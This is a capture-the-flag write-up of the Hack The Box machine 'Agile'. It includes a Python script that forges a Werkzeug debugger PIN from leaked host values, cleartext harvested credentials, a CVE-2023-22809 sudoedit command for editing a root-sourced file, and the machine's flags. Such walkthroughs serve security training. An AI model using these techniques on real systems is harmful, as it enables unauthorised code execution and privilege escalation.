Overview
This was a very interesting box with lots of rabbit holes. Initial foothold was obtained by exploiting LFI to leak some file and use that to find the debug pin of Werkzeug Debugger. Got the user creds from mysql database and from there got the 2nd user creds via chrome remote debugger. Finally got root by exploiting CVE-2023-22809.
Name - Agile
Difficulty - Medium
OS - Linux
Points - 30
Information Gathering
Port Scan
Basic Scan
1
2
3
4
5
6
7
8
9
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-12 04:50 EDT
Nmap scan report for 10.10.11.203
Host is up (0.091s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 3.63 seconds
Version Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
╰─ nmap 10.10.11.203 -p22,80 -sC -sV
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-12 04:50 EDT
Nmap scan report for 10.10.11.203
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f4:bc:ee:21:d7:1f:1a:a2:65:72:21:2d:5b:a6:f7:00 (ECDSA)
|_ 256 65:c1:48:0d:88:cb:b9:75:a0:2c:a5:e6:37:7e:51:06 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://superpass.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
HTTP Enumeration
Visiting the website gives us the following
There is register and login option. I register one test user and logged in with that
We can add password in the vault and export that vault. I got lfi in the following
Also, If we pass some invalid parameter, It will give us the debug page.
But the debugger is locked. To exploit this, I used the following code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#!/bin/python3
import hashlib
from itertools import chain
probably_public_bits = [
'www-data',# username
'flask.app',# modname
'wsgi_app',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/app/venv/lib/python3.10/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'345052384868',# str(uuid.getnode()), /sys/class/net/ens33/address
'ed5b159560f54721827644bc9b220d00superpass.service'# get_machine_id(), /etc/machine-id
]
h = hashlib.sha1() # Newer versions of Werkzeug use SHA1 instead of MD5
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print("Pin: " + rv)
Found the pin 110-709-587. After using that pin, The console unlocked. and now I can run commands from here
Getting User.txt
I made a reverse shell.
Got credential for mysql from /app directory
Mysql Creds - superpassuser:dSA6l7q*yIVs$39Ml6ywvgK
With that creds, I tried to log into mysql and from mysql I found some more creds.
From those creds, this one worked corum:5db7caa1d13cc37c9fc2
Then I got the user flag from the home directory
User Flag - 6d3d0e7906171b800a450d3640c8987e
Getting root.txt
We get a dev or test site also
And also remote dubugging port is set to 41829.
In chrome, We can access it through chrome://inspect option. I got the creds from there
Creds - edwards:d07867c6267dcb5df0af
Now from that user rooting was fairly easy.
1
2
3
4
5
6
7
8
edwards@agile:~$ sudo -l
Matching Defaults entries for edwards on agile:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User edwards may run the following commands on agile:
(dev_admin : dev_admin) sudoedit /app/config_test.json
(dev_admin : dev_admin) sudoedit /app/app-testing/tests/functional/creds.txt
edwards@agile:~$
So, edwards can edit 2 files as dev_admin using sudoedit. But, there is a CVE (CVE-2023-22809) which allows edwards to read and write other files as well which are owned by dev_admin.
So, which file to write. For that I ran pspy to check any cronjob. And I found out, root user is running source /app/venv/bin/activate in every minute. and the dev_admin user can edit it.
1
2
edwards@agile:/app/app-testing$ ls -al /app/venv/bin/activate
-rw-rw-r-- 1 root dev_admin 1976 Jul 12 14:06 /app/venv/bin/activate
So, I opened the file using CVE-2023-22809 edited it with a simple payload.
1
EDITOR='vim -- /app/venv/bin/activate' sudoedit -u dev_admin /app/config_test.json
After a minute, I got the setuid file and became root
Finally I grabbed the root flag
Root Flag - f7ad677bce5fdd00982dfd8dc8edb0ab
Flags
user.txt - 6d3d0e7906171b800a450d3640c8987e
root.txt - f7ad677bce5fdd00982dfd8dc8edb0ab